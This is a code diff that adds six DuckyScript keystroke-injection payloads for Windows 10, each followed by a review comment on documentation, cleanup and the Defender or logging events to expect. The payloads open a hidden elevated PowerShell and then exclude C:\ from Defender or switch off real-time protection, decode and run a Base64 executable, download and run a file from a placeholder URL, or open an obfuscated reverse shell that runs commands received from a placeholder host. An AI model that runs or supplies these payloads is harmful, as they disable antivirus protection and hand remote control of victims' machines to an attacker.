Add files via upload
@@ -0,0 +1,23 @@
|
||||
REM Title: Add Exclusion C-drive
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to add an exclusion to Windows Defender to ingore any files within C:/
|
||||
REM Target: Windows 10
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM add the exclusion path.
|
||||
STRING Add-MpPreference -ExclusionPath C:/
|
||||
ENTER
|
||||
DELAY 250
|
||||
STRING exit
|
||||
ENTER
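Review bot: The header does not say that the exclusion typed by `STRING Add-MpPreference -ExclusionPath C:/` covers the whole system drive and stays in place after `exit`, and the script has no revert step. I would add `REM Note: needs an elevated session; the exclusion persists until removed with Remove-MpPreference -ExclusionPath C:/` under the Target line so a host used for an authorised test is not left unscanned. The same exclusion is added inline in the Download-Execute file (fourth hunk), also without a revert. Defender records this configuration change as event ID 5007 in its Operational log, which is the artefact a defending team should expect from a run. The description also has "ingore" for "ignore".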
|
||||
@@ -0,0 +1,30 @@
|
||||
REM Title: Base64 Decode & Execute
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to decode a Base64 string and then execute the file.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *SETUP*
|
||||
REM replace all placeholders throughout the script.
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window)
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM *replace this below*
|
||||
STRING $b64 = 'YOUR_BASE64_STRING_HERE_IN_SINGLE_QUOTES';
|
||||
|
||||
STRING $decodedFile = [System.Convert]::FromBase64String($b64);
|
||||
|
||||
|
||||
REM *replace NAME_HERE and desired filetype (example is .exe)*
|
||||
STRING $File = "NAME_HERE"+".exe";
|
||||
|
||||
STRING Set-Content -Path $File -Value $decodedFile -Encoding Byte;& $File
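Review bot: Nothing in the header says what this file leaves on the host: `Set-Content -Path $File` writes the decoded bytes into the current directory of the elevated shell, the trailing `& $File` is written to launch the result, and no step removes the file afterwards. I would add `REM Note: writes NAME_HERE.exe to the current directory of an elevated session and does not delete it` so cleanup after an authorised test is not missed. Where PowerShell script block logging is enabled, the typed commands, including the `FromBase64String` call, are expected to appear as event ID 4104, and that is worth stating in the description for the defending side.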
|
||||
@@ -0,0 +1,30 @@
|
||||
REM Title: Disable Real-Time Protection
|
||||
REM Author: @beigeworm
|
||||
REM Description: Manually opens Windows Security window and turns offf Real-Time Protection.
|
||||
REM Target: Windows 10
|
||||
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open Windows Security GUI.
|
||||
GUI r
|
||||
DELAY 1500
|
||||
STRING windowsdefender://
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM run through option list and turn RT-protection off.
|
||||
ENTER
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
SPACE
|
||||
DELAY 300
|
||||
ALT y
|
||||
DELAY 400
|
||||
ALT F4
|
||||
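Review bot: The `ENTER`/`TAB`/`SPACE` run after `STRING windowsdefender://` is blind navigation, and nothing in the file records which Windows Security layout it was written against, so on a different layout the `SPACE` can flip a setting other than the one the title names. I would add a `REM` line naming the Windows build this was checked on and stating that the script never switches the setting back. Turning real-time protection off is logged by Defender as event ID 5001, which is the record to expect from a run of this file. The description has "offf" for "off".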
|
||||
@@ -0,0 +1,23 @@
|
||||
REM Title: Download-Execute from Run Prompt
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses the Run Prompt to download a file and run it.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *SETUP*
|
||||
REM replace FILE_URL_HERE with the url of your file to run.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1;
|
||||
|
||||
REM replace FILE_URL_HERE below.
|
||||
STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit
|
||||
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
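Review bot: The `REM Description:` line says only that a file is downloaded and run, but the first `STRING` line also runs `Add-MpPreference -ExclusionPath C:\`, which excludes the whole system drive from Defender scanning and is left in place afterwards. I would change the line to `REM Description: Uses the Run Prompt to add a Defender exclusion for C:\, download a file to the Temp folder and run it.` and add a `REM` line saying that `upl.exe` stays in `$env:Temp` and that the exclusion has to be removed by hand. Both are host changes that whoever restores the machine needs to know about from the header alone.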
|
||||
@@ -0,0 +1,30 @@
|
||||
REM Title: Set System Language
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to set the Windows system lanuage (exame is UK-US).
|
||||
REM Target: Windows 10
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window)
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM set system language to (example here is US)
|
||||
STRING Dism /online /Get-Intl
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-WinSystemLocale en-US
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Set-WinUserLanguageList en-US -force
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
ENTER
|
||||
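Review bot: The description and the code disagree: the header says "UK-US" (and misspells "language" and "example"), while both setters use `en-US`, and `Dism /online /Get-Intl` only reports the current international settings rather than changing anything. I would reword the header to `REM Description: Uses Powershell to set the Windows system locale and user language list (example is en-US).` and add a `REM` line saying the Dism call is informational. `Set-WinSystemLocale` takes effect only after a restart and `Set-WinUserLanguageList en-US -force` replaces the user's existing language list, so both deserve a comment for whoever has to restore the host afterwards.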
|
||||
@@ -0,0 +1,28 @@
|
||||
REM Title: Simple NetCat Client
|
||||
REM Author: @beigeworm
|
||||
REM Description: Uses Powershell to start a Netcat client that stays open until the system is restarted.
|
||||
REM Target: Windows 10
|
||||
|
||||
REM *REQUIREMENTS*
|
||||
REM start a netcat listener on server machine using port 4444 (eg. nc -lvp 4444).
|
||||
|
||||
REM *SETUP*
|
||||
REM replace YOUR_IP_OR_DOMAIN_HERE with ncat server address.
|
||||
|
||||
REM some setup for dukie script.
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
REM open powershell (remove -W Hidden to show the window).
|
||||
GUI r
|
||||
DELAY 750
|
||||
STRING powershell -NoP -NonI -W Hidden -Exec Bypass
|
||||
CTRL-SHIFT ENTER
|
||||
DELAY 1500
|
||||
ALT y
|
||||
DELAY 5000
|
||||
|
||||
REM write out the main Powershell code.
|
||||
STRING do{;$v = 4;$a = New-Object SyStem.NeT.sockeTs.TCPClieNt("YOUR_IP_OR_DOMAIN_HERE",4444)
|
||||
STRING ;$b = $a.GetStream();[byte[]]$c = 0..65535|%{0};while(($d = $b.Read($c, 0, $c.Length)) -ne 0){;$e = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($c,0, $d)
|
||||
STRING ;$f = (iex $e 2>&1 | Out-String );$g = $f + (pwd).Path + '> ';$h = ([text.encoding]::ASCII).GetBytes($g);$b.Write($h,0,$h.Length);$b.Flush()};$a.Close();Sleep 10}while ($v -le 5)
|
||||
ENTER
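Review bot: The header calls this a Netcat client, but the three `STRING` lines build a PowerShell `TCPClient` loop that hands whatever text arrives on port 4444 to `iex` in an elevated session, over a plain TCP stream with no check of who is on the other end. The description should say so, because that is the exposure a test owner has to accept for the tested host. The `do{...}while ($v -le 5)` condition is constant (`$v` is set to 4 and never changed), so the reconnect loop ends only when the process does. A `REM` line stating that this is intentional, and that the `powershell.exe` process must be ended during cleanup, would help. An elevated `powershell.exe` reconnecting outbound to port 4444 after each `Sleep 10` is a pattern that egress monitoring and process-network telemetry will show.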
|
||||